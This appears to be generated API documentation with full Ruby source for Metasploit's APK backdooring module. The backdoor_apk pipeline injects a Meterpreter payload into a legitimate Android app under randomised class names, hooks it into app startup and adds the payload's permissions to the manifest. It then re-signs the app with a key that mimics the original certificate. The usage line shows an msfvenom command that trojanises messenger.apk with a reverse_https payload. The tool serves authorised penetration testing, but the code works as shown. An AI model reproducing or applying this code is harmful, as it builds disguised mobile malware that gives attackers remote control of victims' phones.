Class: Msf::Payload::Apk

Inherits:
Object
Defined in:
lib/msf/core/payload/apk.rb


Instance Method Details

#backdoor_apk(apkfile, raw_payload, signature = true, manifest = true, apk_data = nil, service = true) ⇒ Object



# File 'lib/msf/core/payload/apk.rb', line 220

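# Backdoor an existing APK with a Metasploit Android payload.
#
# Pipeline: the template and payload APKs are decompiled with apktool, the
# payload's com.metasploit.stage classes are copied into the template under a
# randomised sub-package with randomised class names, a static call to the
# payload entry point is spliced in front of the first `return-void` of the hook
# class chosen by #find_hook_point, the manifest is (optionally) extended with the
# payload's permissions, service and receiver, and the result is rebuilt,
# zipaligned and signed with a freshly generated key. All work happens in a
# temporary directory that is removed on success and on failure.
#
# @param apkfile [String, nil] path to the template APK (nil when apk_data is used)
# @param raw_payload [String] bytes of the payload APK
# @param signature [Boolean] zipalign and sign the result (needs keytool,
#   apksigner and zipalign on PATH)
# @param manifest [Boolean] merge the payload's manifest entries into the template
# @param apk_data [String, nil] template APK bytes, used instead of apkfile
# @param service [Boolean] hook MainService.start() when true, otherwise
#   Payload.startContext()
# @return [String] the rebuilt (and, if requested, signed) APK bytes
# @raise [RuntimeError] on a missing or outdated tool, an unreadable template, or
#   a failed decompile/rebuild/align/sign step
def backdoor_apk(apkfile, raw_payload, signature = true, manifest = true, apk_data = nil, service = true)
  unless apk_data || apkfile && File.readable?(apkfile)
    usage
    raise RuntimeError, "Invalid template: #{apkfile}"
  end

  check_apktool_installation

  # Create temporary directory where work will be done. The ensure below removes
  # it even when a later step raises, so neither the payload nor a half-built APK
  # is left behind on disk (the original only cleaned up on the success path).
  tempdir = Dir.mktmpdir
  begin
    original_apk = "#{tempdir}/original.apk"
    File.binwrite("#{tempdir}/payload.apk", raw_payload)
    if apkfile
      FileUtils.cp apkfile, original_apk
    else
      File.binwrite(original_apk, apk_data)
    end

    signing = nil
    if signature
      check_signing_tools
      # Read the template certificate from the temp copy rather than from apkfile,
      # which is nil when the template was supplied as apk_data.
      signing = create_signing_keystore(tempdir, original_apk)
    end

    print_status "Decompiling original APK..\n"
    apktool_output = run_cmd(['apktool', 'd', original_apk, '--only-main-classes', '-o', "#{tempdir}/original"])
    check_apktool_output_for_exceptions(apktool_output)

    print_status "Decompiling payload APK..\n"
    apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/payload.apk", '-o', "#{tempdir}/payload"])
    check_apktool_output_for_exceptions(apktool_output)

    amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")

    print_status "Locating hook point..\n"
    hookable_class = find_hook_point(amanifest)
    if hookable_class.blank?
      raise 'Unable to find hookable class in AndroidManifest.xml'
    end

    smalifile = locate_hook_smali(tempdir, hookable_class)
    hooksmali = File.binread(smalifile)
    # The payload call is inserted ahead of the first return-void in the class,
    # i.e. inside whichever void method appears first in the smali file.
    entrypoint = 'return-void'
    unless hooksmali.include?(entrypoint)
      raise "Unable to find hookable function in #{smalifile}"
    end

    # Remove unused files
    FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
    FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")

    # Random sub-package and class names replace the stock com.metasploit.stage
    # names (presumably so they are not a trivial signature).
    package = amanifest.xpath("//manifest").first['package']
    package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
    classes = {
      'Payload' => Rex::Text::rand_text_alpha_lower(5).capitalize,
      'MainService' => Rex::Text::rand_text_alpha_lower(5).capitalize,
      'MainBroadcastReceiver' => Rex::Text::rand_text_alpha_lower(5).capitalize
    }
    package_slash = package.gsub(/\./, "/")

    print_status "Adding payload as package #{package}\n"
    install_payload_smali(tempdir, package_slash, classes)

    hookfunction = if service
                     "L#{package_slash}/#{classes['MainService']};->start()V"
                   else
                     "L#{package_slash}/#{classes['Payload']};->startContext()V"
                   end
    payloadhook = "invoke-static {}, #{hookfunction}\n  #{entrypoint}"
    hookedsmali = hooksmali.sub(entrypoint, payloadhook)

    print_status "Loading #{smalifile} and injecting payload..\n"
    File.open(smalifile, "wb") { |file| file.puts hookedsmali }

    if manifest
      print_status "Poisoning the manifest with meterpreter permissions..\n"
      fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver'])
    end

    injected_apk = rebuild_injected_apk(tempdir)
    output_apk = signature ? align_and_sign_apk(tempdir, injected_apk, signing) : injected_apk
    File.binread(output_apk)
  ensure
    # Best-effort cleanup; forced so a removal error cannot mask the real failure.
    FileUtils.remove_entry(tempdir, true)
  end
end

# Verify that apktool (and the java it needs) is runnable and recent enough.
#
# @raise [RuntimeError] when apktool, java or apktool.jar is missing, apktool
#   reports an exception, or its version is older than 2.9.2
private def check_apktool_installation
  check_apktool = run_cmd(%w[apktool -version])
  if check_apktool.nil?
    raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."
  end

  if check_apktool.include?('java: not found')
    raise RuntimeError, "java not found. If it's not in your PATH, please add it."
  end

  jar_name = 'apktool.jar'
  if check_apktool.include?("can't find #{jar_name}")
    raise RuntimeError, "#{jar_name} not found. This file must exist in the same directory as apktool."
  end

  check_apktool_output_for_exceptions(check_apktool)

  # The version string is the first line of `apktool -version` output.
  apktool_version = Rex::Version.new(check_apktool.lines.first.to_s.strip)
  min_required_apktool_version = Rex::Version.new('2.9.2')
  unless apktool_version >= min_required_apktool_version
    # technically MSF supports 2.7.0+ but versions < 2.9.2 are vulnerable to CVE-2024-21633
    # see: https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w
    raise RuntimeError, "apktool version #{apktool_version} not supported, please download at least version #{min_required_apktool_version}."
  end
end

# Verify keytool, apksigner and zipalign can be executed. Each tool is run with
# no arguments; only "executable not found" (run_cmd returning nil) is an error.
#
# @raise [RuntimeError] naming the first missing tool
private def check_signing_tools
  {
    'keytool' => "keytool not found. If it's not in your PATH, please add it.",
    'apksigner' => "apksigner not found. If it's not in your PATH, please add it.",
    'zipalign' => "zipalign not found. If it's not in your PATH, please add it."
  }.each do |tool, message|
    raise RuntimeError, message if run_cmd([tool]).nil?
  end
end

# Generate a throwaway RSA-2048 signing key in a keystore under tempdir.
#
# Only the subject DN, start date and validity of the template's certificate are
# copied (see #extract_cert_data_from_apk_file); the key material itself is new,
# so the output will not carry the template's original signature.
#
# @param tempdir [String] work directory
# @param apk_path [String] APK whose certificate metadata is mimicked
# @return [Hash] :keystore path and :storepass for apksigner
# @raise [RuntimeError] when keytool reports an error
private def create_signing_keystore(tempdir, apk_path)
  keystore = "#{tempdir}/signing.keystore"
  storepass = "android"
  keypass = "android"
  keyalias = "signing.key"

  orig_cert_dname, orig_cert_startdate, orig_cert_validity = extract_cert_data_from_apk_file(apk_path)

  print_status "Creating signing key and keystore..\n"
  keytool_output = run_cmd([
    'keytool', '-genkey', '-v', '-keystore', keystore, '-alias', keyalias, '-storepass', storepass,
    '-keypass', keypass, '-keyalg', 'RSA', '-keysize', '2048', '-startdate', orig_cert_startdate,
    '-validity', orig_cert_validity, '-dname', orig_cert_dname
  ])

  if keytool_output.to_s.include?('keytool error: ')
    raise RuntimeError, "keytool could not generate key: #{keytool_output}"
  end

  { keystore: keystore, storepass: storepass }
end

# Locate the decompiled smali file of the hook class under any smali*/ tree.
# Symlinks are skipped, presumably so a crafted template cannot redirect the
# later in-place rewrite of this file outside the decompiled tree.
#
# @param tempdir [String] work directory
# @param hookable_class [String] fully qualified class name from #find_hook_point
# @return [String] path of a readable, non-symlink smali file
# @raise [RuntimeError] when no such file exists
private def locate_hook_smali(tempdir, hookable_class)
  hookable_class_filename = hookable_class.to_s.gsub('.', '/') + '.smali'
  hookable_class_filepath = "#{tempdir}/original/smali*/#{hookable_class_filename}"
  smalifile = Dir.glob(hookable_class_filepath).find { |f| File.readable?(f) && !File.symlink?(f) }
  if smalifile.blank?
    raise "Unable to find class file: #{hookable_class_filepath}"
  end
  smalifile
end

# Copy the payload's smali classes into the template tree under the randomised
# package, rewriting class references and renaming the classes listed in
# `classes` (old name => new name) along the way.
#
# @param tempdir [String] work directory
# @param package_slash [String] target package in path form (a/b/c)
# @param classes [Hash{String => String}] payload class renames
private def install_payload_smali(tempdir, package_slash, classes)
  payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
  payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
  FileUtils.mkdir_p payload_dir

  payload_files.each do |file_name|
    smali = File.binread(file_name)
    smali_class = File.basename(file_name)
    classes.each do |oldclass, newclass|
      smali_class = "#{newclass}.smali" if smali_class == "#{oldclass}.smali"
      smali.gsub!(/com\/metasploit\/stage\/#{oldclass}/, package_slash + "/" + newclass)
    end
    smali.gsub!(/com\/metasploit\/stage/, package_slash)
    File.open("#{payload_dir}#{smali_class}", "wb") { |file| file.puts smali }
  end
end

# Rebuild the modified tree with apktool, retrying once with AAPT2 when the
# first build yields no readable APK.
#
# @param tempdir [String] work directory
# @return [String] path of the rebuilt APK
# @raise [RuntimeError] when both builds fail
private def rebuild_injected_apk(tempdir)
  injected_apk = "#{tempdir}/output.apk"

  print_status "Rebuilding apk with meterpreter injection as #{injected_apk}\n"
  apktool_output = run_cmd(['apktool', 'b', '-o', injected_apk, "#{tempdir}/original"])
  check_apktool_output_for_exceptions(apktool_output)
  return injected_apk if File.readable?(injected_apk)

  print_error apktool_output
  print_status("Unable to rebuild apk. Trying rebuild with AAPT2..\n")
  apktool_output = run_cmd(['apktool', 'b', '--use-aapt2', '-o', injected_apk, "#{tempdir}/original"])
  return injected_apk if File.readable?(injected_apk)

  print_error apktool_output
  raise RuntimeError, "Unable to rebuild apk with apktool"
end

# zipalign the rebuilt APK, sign it in place with the generated key and verify
# the signature.
#
# @param tempdir [String] work directory
# @param injected_apk [String] path of the rebuilt, unsigned APK
# @param signing [Hash] :keystore and :storepass from #create_signing_keystore
# @return [String] path of the aligned, signed APK
# @raise [RuntimeError] when aligning, signing or verification fails
private def align_and_sign_apk(tempdir, injected_apk, signing)
  aligned_apk = "#{tempdir}/aligned.apk"

  print_status "Aligning #{injected_apk}\n"
  zipalign_output = run_cmd(['zipalign', '-p', '4', injected_apk, aligned_apk])
  unless File.readable?(aligned_apk)
    print_error(zipalign_output)
    raise RuntimeError, 'Unable to align apk with zipalign.'
  end

  print_status "Signing #{aligned_apk} with apksigner\n"
  # The keystore password is passed as `pass:` on the command line, where other
  # local users may read it from the process list. Tolerable only because the
  # key is a throwaway generated in tempdir for this single build.
  apksigner_output = run_cmd([
    'apksigner', 'sign', '--ks', signing[:keystore], '--ks-pass', "pass:#{signing[:storepass]}", aligned_apk
  ])
  if apksigner_output.to_s.include?('Failed')
    print_error(apksigner_output)
    raise RuntimeError, 'Signing with apksigner failed.'
  end

  apksigner_verify = run_cmd(['apksigner', 'verify', '--verbose', aligned_apk])
  if apksigner_verify.to_s.include?('DOES NOT VERIFY')
    print_error(apksigner_verify)
    raise RuntimeError, 'Signature verification failed.'
  end

  aligned_apk
end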

#check_apktool_output_for_exceptions(apktool_output) ⇒ Object



# File 'lib/msf/core/payload/apk.rb', line 213

# Abort when apktool's combined stdout/stderr reports an uncaught Java exception.
#
# @param apktool_output [String, nil] output captured from apktool by #run_cmd
# @return [nil] when no exception marker is present
# @raise [RuntimeError] after echoing the offending output via #print_error
def check_apktool_output_for_exceptions(apktool_output)
  return unless apktool_output.to_s.include?('Exception in thread')

  print_error(apktool_output)
  raise RuntimeError, "apktool execution failed"
end

#extract_cert_data_from_apk_file(path) ⇒ Object



# File 'lib/msf/core/payload/apk.rb', line 149

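# Read the signing certificate of an APK so the replacement key can mimic it.
#
# The v1 (JAR) signature is inspected with keytool. When the APK carries no v1
# signature (v2/v3/v4 schemes only) the signer DN is taken from
# `apksigner verify --print-certs` instead; only the DN is recoverable there, so a
# start date within the past three years is picked at random and a 25-year
# validity is assumed.
#
# @param path [String] path to the APK file
# @return [Array<String>] `[dname, start_date, validity_days]` in the forms
#   keytool -genkey takes for `-dname`, `-startdate` (`YYYY/MM/DD HH:MM:SS`)
#   and `-validity` (days)
# @raise [RuntimeError] when keytool fails or no certificate owner / validity
#   window can be parsed
def extract_cert_data_from_apk_file(path)
  # extract signing scheme v1 (JAR signing) certificate
  # v1 signing is optional to support older versions of Android (pre Android 11)
  # https://source.android.com/security/apksigning/
  # -J-Duser.language=en pins keytool's output language so the `Owner:` /
  # `Valid from:` labels matched below do not depend on the host locale.
  keytool_output = run_cmd(['keytool', '-J-Duser.language=en', '-printcert', '-jarfile', path]).to_s

  if keytool_output.include?('keytool error: ')
    raise RuntimeError, "keytool could not parse APK file: #{keytool_output}"
  end

  if keytool_output.start_with?('Not a signed jar file')
    # apk file does not have a valid v1 signing certificate
    # extract signing certificate from newer signing schemes (v2/v3/v4/...) using apksigner instead
    cert_data_from_apksigner(path)
  else
    cert_data_from_keytool(keytool_output)
  end
end

# Signer DN from apksigner plus synthetic dates, for APKs without a v1 signature.
#
# @param path [String] path to the APK file
# @return [Array<String>] `[dname, start_date, validity_days]`
# @raise [RuntimeError] when no signer DN is printed
private def cert_data_from_apksigner(path)
  apksigner_output = run_cmd(['apksigner', 'verify', '--print-certs', path]).to_s

  cert_dname = apksigner_output.scan(/^Signer #\d+ certificate DN: (.+)$/).flatten.first.to_s.strip
  if cert_dname.blank?
    raise RuntimeError, "Could not extract signing certificate owner: #{apksigner_output}"
  end

  # Create random start date from some time in the past 3 years
  from_date = DateTime.now.next_day(-rand(3 * 365))

  # Valid for 25 years
  # https://developer.android.com/studio/publish/app-signing
  to_date = from_date.next_year(25)
  validity = (to_date - from_date).to_i

  [cert_dname, from_date.strftime('%Y/%m/%d %T'), validity.to_s]
end

# Owner DN and validity window parsed from `keytool -printcert` output.
#
# @param keytool_output [String] keytool's combined output
# @return [Array<String>] `[dname, start_date, validity_days]`
# @raise [RuntimeError] when the Owner or Valid from/until line is missing
private def cert_data_from_keytool(keytool_output)
  cert_dname = keytool_output.scan(/^Owner:(.+)$/).flatten.first.to_s.strip
  if cert_dname.blank?
    raise RuntimeError, "Could not extract signing certificate owner: #{keytool_output}"
  end

  # A missing "Valid from:" line used to raise NoMethodError on nil; it is now
  # reported as a parse error like the other failures.
  dates = keytool_output.match(/^Valid from:\s*(?<from>.+?)\s*until:\s*(?<to>.+)$/)
  if dates.nil?
    raise RuntimeError, "Could not extract certificate date: #{keytool_output}"
  end

  from_date = DateTime.parse(dates[:from].strip)
  to_date = DateTime.parse(dates[:to].strip)
  validity = (to_date - from_date).to_i

  [cert_dname, from_date.strftime('%Y/%m/%d %T'), validity.to_s]
end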

#find_hook_point(manifest) ⇒ String

Find a suitable class to hook: the manifest's &lt;application&gt; class when it names one other than android.app.Application, otherwise the first &lt;activity&gt; or &lt;activity-alias&gt; that declares a LAUNCHER category. Returns the first suitable hook point.

Parameters:

  • manifest (Nokogiri::XML::Document)

    Parsed AndroidManifest.xml, as returned by #parse_manifest (the method calls #xpath on it)

Returns:

  • (String, nil)

    Full class name, for example: com.example.app.MainActivity; nil when the manifest declares no hookable class



# File 'lib/msf/core/payload/apk.rb', line 43

# Pick the class whose smali will receive the payload hook.
#
# The <application> class wins when the manifest names one other than the stock
# android.app.Application; otherwise the first <activity> / <activity-alias>
# carrying a LAUNCHER category is used. Relative names (".Main" or a bare "Main")
# are qualified with the manifest package.
#
# @param manifest [Nokogiri::XML::Document] parsed AndroidManifest.xml
# @return [String, nil] fully qualified class name, e.g. com.example.app.MainActivity,
#   or nil when nothing hookable is declared
def find_hook_point(manifest)
  return unless manifest

  package = manifest.xpath('//manifest').first['package']

  # A name without a dot is treated as relative; relative names get the package prefix.
  qualify = lambda do |name|
    name = ".#{name}" unless name.include?('.')
    name.start_with?('.') ? package + name : name
  end

  application_name = manifest.xpath('//application').attribute('name').to_s
  unless application_name.blank? || application_name == 'android.app.Application'
    return qualify.call(application_name)
  end

  manifest.xpath('//activity|//activity-alias').each do |activity|
    activity_name = activity.attribute('targetActivity').to_s
    activity_name = activity.attribute('name').to_s if activity_name.blank?
    next if activity_name.blank?

    # The second value looks like an intent action rather than a category; it is
    # kept for compatibility with the original matching.
    launcher = activity.search('category').any? do |cat|
      %w[android.intent.category.LAUNCHER android.intent.action.MAIN].include?(cat.attribute('name').to_s)
    end
    return qualify.call(activity_name) if launcher
  end

  nil
end

#fix_manifest(tempdir, package, main_service, main_broadcast_receiver) ⇒ Object



# File 'lib/msf/core/payload/apk.rb', line 102

# Merge the payload's manifest entries into the decompiled template manifest.
#
# Every <uses-permission> the payload declares and the template lacks is inserted
# (in random order) ahead of the template's existing permissions, or ahead of
# <application> when it declares none. The payload's <receiver> and <service>
# are appended to <application> under their randomised package and class names.
# The result overwrites tempdir/original/AndroidManifest.xml.
#
# @param tempdir [String] work directory holding payload/ and original/
# @param package [String] randomised sub-package the payload classes live in
# @param main_service [String] randomised class name of MainService
# @param main_broadcast_receiver [String] randomised class name of MainBroadcastReceiver
def fix_manifest(tempdir, package, main_service, main_broadcast_receiver)
  #Load payload's manifest
  payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
  payload_permissions = payload_manifest.xpath("//manifest/uses-permission")

  #Load original apk's manifest
  original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
  original_permissions = original_manifest.xpath("//manifest/uses-permission")

  known = original_permissions.map { |perm| perm.attribute("name").to_s }
  missing = payload_permissions.reject { |perm| known.include?(perm.attribute("name").to_s) }
  add_permissions = missing.map(&:to_xml).shuffle

  application = original_manifest.xpath('//manifest/application')
  add_permissions.each do |permission_xml|
    print_status("Adding #{permission_xml}")
    if original_permissions.empty?
      # Nothing to anchor on yet: go in front of <application>, then re-query so
      # the remaining permissions are inserted ahead of this one.
      application.before(permission_xml)
      original_permissions = original_manifest.xpath("//manifest/uses-permission")
    else
      original_permissions.before(permission_xml)
    end
  end

  application = original_manifest.at_xpath('/manifest/application')
  receiver = payload_manifest.at_xpath('/manifest/application/receiver')
  service = payload_manifest.at_xpath('/manifest/application/service')
  receiver.attributes["name"].value = "#{package}.#{main_broadcast_receiver}"
  receiver.attributes["label"].value = main_broadcast_receiver
  service.attributes["name"].value = "#{package}.#{main_service}"
  application << receiver.to_xml
  application << service.to_xml

  File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
end

#parse_manifest(manifest_file) ⇒ Nokogiri::XML

Read AndroidManifest.xml file.

Parameters:

  • manifest_file (String)

    Path to AndroidManifest.xml file

Returns:

  • (Nokogiri::XML)

    AndroidManifest.xml file contents



# File 'lib/msf/core/payload/apk.rb', line 95

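# Read and parse an AndroidManifest.xml as written out by apktool.
#
# @param manifest_file [String] path to AndroidManifest.xml
# @return [Nokogiri::XML::Document] parsed manifest
# @raise [SystemCallError] when the file cannot be read
def parse_manifest(manifest_file)
  # The previous version opened the file and then re-read it by handle via
  # File.read, holding two descriptors on the same file; a single binary read
  # matches the "wb" write in #fix_manifest.
  Nokogiri::XML(File.binread(manifest_file))
end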


# File 'lib/msf/core/payload/apk.rb', line 17

# Write an error line to stderr with the "[-] " prefix (puts semantics: a
# trailing newline is added only when msg does not already end with one).
#
# @param msg [#to_s] message to print
# @return [nil]
def print_error(msg='')
  $stderr.puts(format('[-] %s', msg))
end


# File 'lib/msf/core/payload/apk.rb', line 13

# Write a status line to stderr with the "[*] " prefix (puts semantics: a
# trailing newline is added only when msg does not already end with one).
#
# @param msg [#to_s] message to print
# @return [nil]
def print_status(msg='')
  $stderr.puts(format('[*] %s', msg))
end

#run_cmd(cmd) ⇒ Object



# File 'lib/msf/core/payload/apk.rb', line 28

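# Run an external tool and return its stdout followed by its stderr.
#
# The argv elements are handed to Open3 individually, so with two or more
# elements no shell is involved and arguments such as file paths are not
# interpreted; single-element calls in this file only use constant tool names.
# stderr is drained on a separate thread while stdout is read, so a tool that
# writes more than a pipe buffer of diagnostics no longer deadlocks against the
# sequential reads the original did, and the child is waited on so it does not
# linger as a zombie.
#
# @param cmd [Array<String>] program and its arguments
# @return [String, nil] stdout + stderr, or nil when the program does not exist
def run_cmd(cmd)
  Open3.popen3(*cmd) do |stdin, stdout, stderr, wait_thr|
    stdin.close
    err_reader = Thread.new { stderr.read }
    out = stdout.read
    err = err_reader.value
    wait_thr.value
    out + err
  end
rescue Errno::ENOENT
  nil
end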

#usageObject



# File 'lib/msf/core/payload/apk.rb', line 23

# Print the msfvenom -x usage hint to stderr via #print_error.
#
# @return [nil]
def usage
  [
    "Usage: #{$0} -x [target.apk] [msfvenom options]\n",
    "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
  ].each { |line| print_error line }
  nil
end